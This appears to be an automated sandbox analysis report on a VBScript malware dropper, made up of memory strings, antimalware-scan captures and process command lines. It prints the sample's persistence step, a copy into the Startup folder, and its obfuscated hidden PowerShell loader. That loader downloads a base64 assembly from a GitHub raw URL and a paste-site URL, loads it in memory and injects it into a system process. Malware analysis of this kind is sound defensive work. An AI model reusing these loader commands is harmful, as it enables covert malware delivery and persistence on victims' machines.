Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineProperty source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeDefByName source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetModuleProps source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldRVA source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFieldsWithName source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 00000008.00000002.2502842295.00007FFD34860000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp

Data Obfuscation

VBScript performs obfuscated calls to suspicious functions

Source: C:\Windows\System32\wscript.exe

Anti Malware Scan Interface: .Run("cmd.exe /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Co", "0", "true");IHost.FullName();IWshShell3.CurrentDirectory();IHost.ScriptName();IWshShell3.SpecialFolders("Startup");IFileSystem3.FileExists("C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pinheirame.vbs");IFileSystem3.CopyFile("C:\Windows\system32\Payment.vbs", "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pinheirame.vbs");IWshShell3.Run("cmd.exe /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Co", "0", "true");IWshShell3.Run("powershell -command $Codigo = 'SWV4ICgoKCdoJysnUmZ1JysncmwgPSBoM2todHRwczo", "0", "false")

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Anti Malware Scan Interface: $Codigo = 'SWV4ICgoKCdoJysnUmZ1JysncmwgPSBoM2todHRwczonKycvLycrJ3JhJysndy4nKydnaXRodScrJ2J1Jysnc2VyJysnY29udGVuJysndC5jb20nKycvTm8nKydEZXRlY3RPJysnbi9Ob0RldGVjdE9uL3JlZnMvaGVhZHMvbWFpbi9EZScrJ3RhaE5vdGgtJysnVi50eHRoM2s7IGhSJysnZmInKydhc2U2NCcrJ0NvbnRlbnQgPScrJyAoTmUnKyd3LU9iamVjdCBTeXN0ZScrJ20uTicrJ2V0LldlYicrJ0NsaWVudCkuRG93bmxvYWRTdHInKydpbmcnKycoaFInKydmdXJsKTsgaFInKydmYmluYXInKyd5QycrJ29udGVudCA9IFtTJysneScrJ3N0ZW0uQ29udmVyJysndF06JysnOkZyb21CYScrJ3MnKydlNjRTdHInKydpbmcoaCcrJ1JmYicrJ2EnKydzJysnZTY0Q28nKydudGVudCcrJyknKyc7IGgnKydSZmEnKydzcycrJ2VtYmx5ID0gW1JlZmxlJysnY3Rpb24nKycuQXNzZW1ibHknKyddOjpMb2FkKGhSZmJpbmFyeUNvbnRlbnQpOyBbZCcrJ25saWInKycuSU8uSG9tZV06OlZBSSgnKydDdXQwL08nKycxRktTL2QvZWUuZXRzYXAnKycvLzpzcHR0aCcrJ0N1dCwgQ3UnKyd0ZCcrJ2VzYXRpdmFkb0N1dCwnKycgJysnQ3UnKyd0ZGVzYXRpdmFkb0N1dCwgJysnQ3V0ZGUnKydzYXRpdmFkb0N1dCwgQ3V0ZCcrJ2VzJysnYXQnKydpdmEnKydkbycrJ0N1dCwnKycgQycrJ3V0MUMnKyd1dCwgQ3V0YXBwaWR0ZWxDdXQpJykgIC1jUkVwbEFjRSdDdXQnLFtjSEFSXTM0ICAtUkVwTEFDZSAgKFtjSEFSXTEwNCtbY0hBUl04MitbY0hBUl0xMDIpLFtjSEFSXTM2ICAtUkVwTEFDZShbY0hBUl0xMDQrW2NIQVJdNTErW2NIQVJdMTA3KSxbY0hBUl0zOSkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD$global:?

Obfuscated command line found

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "Iex ((('h'+'Rfu'+'rl = h3khttps:'+'//'+'ra'+'w.'+'githu'+'bu'+'ser'+'conten'+'t.com'+'/No'+'DetectO'+'n/NoDetectOn/refs/heads/main/De'+'tahNoth-'+'V.txth3k; hR'+'fb'+'ase64'+'Content ='+' (Ne'+'w-Object Syste'+'m.N'+'et.Web'+'Client).DownloadStr'+'ing'+'(hR'+'furl); hR'+'fbinar'+'yC'+'ontent = [S'+'y'+'stem.Conver'+'t]:'+':FromBa'+'s'+'e64Str'+'ing(h'+'Rfb'+'a'+'s'+'e64Co'+'ntent'+')'+'; h'+'Rfa'+'ss'+'embly = [Refle'+'ction'+'.Assembly'+']::Load(hRfbinaryContent); [d'+'nlib'+'.IO.Home]::VAI('+'Cut0/O'+'1FKS/d/ee.etsap'+'//:sptth'+'Cut, Cu'+'td'+'esativadoCut,'+' '+'Cu'+'tdesativadoCut, '+'Cutde'+'sativadoCut, Cutd'+'es'+'at'+'iva'+'do'+'Cut,'+' C'+'ut1C'+'ut, CutappidtelCut)') -cREplAcE'Cut',[cHAR]34 -REpLACe ([cHAR]104+[cHAR]82+[cHAR]102),[cHAR]36 -REpLACe([cHAR]104+[cHAR]51+[cHAR]107),[cHAR]39))"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "Iex ((('h'+'Rfu'+'rl = h3khttps:'+'//'+'ra'+'w.'+'githu'+'bu'+'ser'+'conten'+'t.com'+'/No'+'DetectO'+'n/NoDetectOn/refs/heads/main/De'+'tahNoth-'+'V.txth3k; hR'+'fb'+'ase64'+'Content ='+' (Ne'+'w-Object Syste'+'m.N'+'et.Web'+'Client).DownloadStr'+'ing'+'(hR'+'furl); hR'+'fbinar'+'yC'+'ontent = [S'+'y'+'stem.Conver'+'t]:'+':FromBa'+'s'+'e64Str'+'ing(h'+'Rfb'+'a'+'s'+'e64Co'+'ntent'+')'+'; h'+'Rfa'+'ss'+'embly = [Refle'+'ction'+'.Assembly'+']::Load(hRfbinaryContent); [d'+'nlib'+'.IO.Home]::VAI('+'Cut0/O'+'1FKS/d/ee.etsap'+'//:sptth'+'Cut, Cu'+'td'+'esativadoCut,'+' '+'Cu'+'tdesativadoCut, '+'Cutde'+'sativadoCut, Cutd'+'es'+'at'+'iva'+'do'+'Cut,'+' C'+'ut1C'+'ut, CutappidtelCut)') -cREplAcE'Cut',[cHAR]34 -REpLACe ([cHAR]104+[cHAR]82+[cHAR]102),[cHAR]36 -REpLACe([cHAR]104+[cHAR]51+[cHAR]107),[cHAR]39))"			Jump to behavior

Suspicious powershell command line found

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SWV4ICgoKCdoJysnUmZ1JysncmwgPSBoM2todHRwczonKycvLycrJ3JhJysndy4nKydnaXRodScrJ2J1Jysnc2VyJysnY29udGVuJysndC5jb20nKycvTm8nKydEZXRlY3RPJysnbi9Ob0RldGVjdE9uL3JlZnMvaGVhZHMvbWFpbi9EZScrJ3RhaE5vdGgtJysnVi50eHRoM2s7IGhSJysnZmInKydhc2U2NCcrJ0NvbnRlbnQgPScrJyAoTmUnKyd3LU9iamVjdCBTeXN0ZScrJ20uTicrJ2V0LldlYicrJ0NsaWVudCkuRG93bmxvYWRTdHInKydpbmcnKycoaFInKydmdXJsKTsgaFInKydmYmluYXInKyd5QycrJ29udGVudCA9IFtTJysneScrJ3N0ZW0uQ29udmVyJysndF06JysnOkZyb21CYScrJ3MnKydlNjRTdHInKydpbmcoaCcrJ1JmYicrJ2EnKydzJysnZTY0Q28nKydudGVudCcrJyknKyc7IGgnKydSZmEnKydzcycrJ2VtYmx5ID0gW1JlZmxlJysnY3Rpb24nKycuQXNzZW1ibHknKyddOjpMb2FkKGhSZmJpbmFyeUNvbnRlbnQpOyBbZCcrJ25saWInKycuSU8uSG9tZV06OlZBSSgnKydDdXQwL08nKycxRktTL2QvZWUuZXRzYXAnKycvLzpzcHR0aCcrJ0N1dCwgQ3UnKyd0ZCcrJ2VzYXRpdmFkb0N1dCwnKycgJysnQ3UnKyd0ZGVzYXRpdmFkb0N1dCwgJysnQ3V0ZGUnKydzYXRpdmFkb0N1dCwgQ3V0ZCcrJ2VzJysnYXQnKydpdmEnKydkbycrJ0N1dCwnKycgQycrJ3V0MUMnKyd1dCwgQ3V0YXBwaWR0ZWxDdXQpJykgIC1jUkVwbEFjRSdDdXQnLFtjSEFSXTM0ICAtUkVwTEFDZSAgKFtjSEFSXTEwNCtbY0hBUl04MitbY0hBUl0xMDIpLFtjSEFSXTM2ICAtUkVwTEFDZShbY0hBUl0xMDQrW2NIQVJdNTErW2NIQVJdMTA3KSxbY0hBUl0zOSkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "Iex ((('h'+'Rfu'+'rl = h3khttps:'+'//'+'ra'+'w.'+'githu'+'bu'+'ser'+'conten'+'t.com'+'/No'+'DetectO'+'n/NoDetectOn/refs/heads/main/De'+'tahNoth-'+'V.txth3k; hR'+'fb'+'ase64'+'Content ='+' (Ne'+'w-Object Syste'+'m.N'+'et.Web'+'Client).DownloadStr'+'ing'+'(hR'+'furl); hR'+'fbinar'+'yC'+'ontent = [S'+'y'+'stem.Conver'+'t]:'+':FromBa'+'s'+'e64Str'+'ing(h'+'Rfb'+'a'+'s'+'e64Co'+'ntent'+')'+'; h'+'Rfa'+'ss'+'embly = [Refle'+'ction'+'.Assembly'+']::Load(hRfbinaryContent); [d'+'nlib'+'.IO.Home]::VAI('+'Cut0/O'+'1FKS/d/ee.etsap'+'//:sptth'+'Cut, Cu'+'td'+'esativadoCut,'+' '+'Cu'+'tdesativadoCut, '+'Cutde'+'sativadoCut, Cutd'+'es'+'at'+'iva'+'do'+'Cut,'+' C'+'ut1C'+'ut, CutappidtelCut)') -cREplAcE'Cut',[cHAR]34 -REpLACe ([cHAR]104+[cHAR]82+[cHAR]102),[cHAR]36 -REpLACe([cHAR]104+[cHAR]51+[cHAR]107),[cHAR]39))"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SWV4ICgoKCdoJysnUmZ1JysncmwgPSBoM2todHRwczonKycvLycrJ3JhJysndy4nKydnaXRodScrJ2J1Jysnc2VyJysnY29udGVuJysndC5jb20nKycvTm8nKydEZXRlY3RPJysnbi9Ob0RldGVjdE9uL3JlZnMvaGVhZHMvbWFpbi9EZScrJ3RhaE5vdGgtJysnVi50eHRoM2s7IGhSJysnZmInKydhc2U2NCcrJ0NvbnRlbnQgPScrJyAoTmUnKyd3LU9iamVjdCBTeXN0ZScrJ20uTicrJ2V0LldlYicrJ0NsaWVudCkuRG93bmxvYWRTdHInKydpbmcnKycoaFInKydmdXJsKTsgaFInKydmYmluYXInKyd5QycrJ29udGVudCA9IFtTJysneScrJ3N0ZW0uQ29udmVyJysndF06JysnOkZyb21CYScrJ3MnKydlNjRTdHInKydpbmcoaCcrJ1JmYicrJ2EnKydzJysnZTY0Q28nKydudGVudCcrJyknKyc7IGgnKydSZmEnKydzcycrJ2VtYmx5ID0gW1JlZmxlJysnY3Rpb24nKycuQXNzZW1ibHknKyddOjpMb2FkKGhSZmJpbmFyeUNvbnRlbnQpOyBbZCcrJ25saWInKycuSU8uSG9tZV06OlZBSSgnKydDdXQwL08nKycxRktTL2QvZWUuZXRzYXAnKycvLzpzcHR0aCcrJ0N1dCwgQ3UnKyd0ZCcrJ2VzYXRpdmFkb0N1dCwnKycgJysnQ3UnKyd0ZGVzYXRpdmFkb0N1dCwgJysnQ3V0ZGUnKydzYXRpdmFkb0N1dCwgQ3V0ZCcrJ2VzJysnYXQnKydpdmEnKydkbycrJ0N1dCwnKycgQycrJ3V0MUMnKyd1dCwgQ3V0YXBwaWR0ZWxDdXQpJykgIC1jUkVwbEFjRSdDdXQnLFtjSEFSXTM0ICAtUkVwTEFDZSAgKFtjSEFSXTEwNCtbY0hBUl04MitbY0hBUl0xMDIpLFtjSEFSXTM2ICAtUkVwTEFDZShbY0hBUl0xMDQrW2NIQVJdNTErW2NIQVJdMTA3KSxbY0hBUl0zOSkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "Iex ((('h'+'Rfu'+'rl = h3khttps:'+'//'+'ra'+'w.'+'githu'+'bu'+'ser'+'conten'+'t.com'+'/No'+'DetectO'+'n/NoDetectOn/refs/heads/main/De'+'tahNoth-'+'V.txth3k; hR'+'fb'+'ase64'+'Content ='+' (Ne'+'w-Object Syste'+'m.N'+'et.Web'+'Client).DownloadStr'+'ing'+'(hR'+'furl); hR'+'fbinar'+'yC'+'ontent = [S'+'y'+'stem.Conver'+'t]:'+':FromBa'+'s'+'e64Str'+'ing(h'+'Rfb'+'a'+'s'+'e64Co'+'ntent'+')'+'; h'+'Rfa'+'ss'+'embly = [Refle'+'ction'+'.Assembly'+']::Load(hRfbinaryContent); [d'+'nlib'+'.IO.Home]::VAI('+'Cut0/O'+'1FKS/d/ee.etsap'+'//:sptth'+'Cut, Cu'+'td'+'esativadoCut,'+' '+'Cu'+'tdesativadoCut, '+'Cutde'+'sativadoCut, Cutd'+'es'+'at'+'iva'+'do'+'Cut,'+' C'+'ut1C'+'ut, CutappidtelCut)') -cREplAcE'Cut',[cHAR]34 -REpLACe ([cHAR]104+[cHAR]82+[cHAR]102),[cHAR]36 -REpLACe([cHAR]104+[cHAR]51+[cHAR]107),[cHAR]39))"	Jump to behavior

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00007FFD346300BD pushad ; iretd	5_2_00007FFD346300C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00007FFD346309AD push ss; retf	5_2_00007FFD346309C6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00007FFD34634FF3 push eax; retf	5_2_00007FFD34634FE9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_00007FFD346425CD push edx; retf	6_2_00007FFD34642636
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_00007FFD34641D9F push eax; iretd	6_2_00007FFD3464233D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FFD346200BD pushad ; iretd	8_2_00007FFD346200C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FFD34627006 push esp; iretd	8_2_00007FFD3462700C
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_004190B6 push esi; ret	10_2_004190B9
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0041AAB9 push esp; retf	10_2_0041AB04
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_004123D8 push edi; retf	10_2_004123EF
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_004123E3 push edi; retf	10_2_004123EF
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_004023B0 push esi; iretd	10_2_004023BA
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0040AC71 push edi; retf	10_2_0040AC73
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_004074B7 pushfd ; iretd	10_2_004074B9
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_00412549 push ebx; iretd	10_2_0041254A
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_00403590 push eax; ret	10_2_00403592
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_00411E28 push ebx; retf	10_2_00411E2D
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_00406685 push FFFFFFCBh; retf	10_2_0040668C
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039009AD push ecx; mov dword ptr [esp], ecx	10_2_039009B6
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe	Code function: 17_2_03ACA3FC push ecx; iretd	17_2_03ACA41A
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe	Code function: 17_2_03ACEB69 push esp; retf	17_2_03ACEBB4
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe	Code function: 17_2_03ACD166 push esi; ret	17_2_03ACD169
